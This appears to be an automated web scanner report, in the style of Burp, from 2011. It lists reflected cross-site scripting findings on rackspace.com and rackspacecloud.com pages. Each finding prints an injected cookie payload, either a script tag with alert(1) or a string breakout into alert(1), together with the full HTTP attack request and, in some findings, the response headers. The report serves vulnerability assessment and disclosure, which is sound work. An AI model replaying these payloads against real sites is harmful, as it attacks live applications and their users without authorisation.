Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39982
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f24"><script>alert(1)</script>1924ca8b755 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f882f24"><script>alert(1)</script>1924ca8b755; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff56a"><script>alert(1)</script>5e7f7cd480e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dff56a"><script>alert(1)</script>5e7f7cd480e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6820"%3balert(1)//ce16d48491a was submitted in the chatslider cookie. This input was echoed as b6820";alert(1)//ce16d48491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db6820"%3balert(1)//ce16d48491a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23596"%3balert(1)//4125469c9b7 was submitted in the IS_UASrackuid cookie. This input was echoed as 23596";alert(1)//4125469c9b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f823596"%3balert(1)//4125469c9b7; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed39"><script>alert(1)</script>fa749f42c46 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81ed39"><script>alert(1)</script>fa749f42c46; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dcd"%3balert(1)//4f10668ea74 was submitted in the chatslider cookie. This input was echoed as 14dcd";alert(1)//4f10668ea74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D14dcd"%3balert(1)//4f10668ea74; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9410"><script>alert(1)</script>a2d67b75440 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc9410"><script>alert(1)</script>a2d67b75440; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7974"><script>alert(1)</script>818142f1e24 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/contact/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db7974"><script>alert(1)</script>818142f1e24; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdfd9"%3balert(1)//b2cda283735 was submitted in the chatslider cookie. This input was echoed as cdfd9";alert(1)//b2cda283735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/contact/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dcdfd9"%3balert(1)//b2cda283735; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17eb3"%3balert(1)//28c87ae40e2 was submitted in the chatslider cookie. This input was echoed as 17eb3";alert(1)//28c87ae40e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutus/events/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D17eb3"%3balert(1)//28c87ae40e2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b26"><script>alert(1)</script>65525cea6aa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/events/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D55b26"><script>alert(1)</script>65525cea6aa; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4627b"><script>alert(1)</script>32c126ded98 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aboutus/story/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D4627b"><script>alert(1)</script>32c126ded98; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86a93"%3balert(1)//3b3b8c9a118 was submitted in the chatslider cookie. This input was echoed as 86a93";alert(1)//3b3b8c9a118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
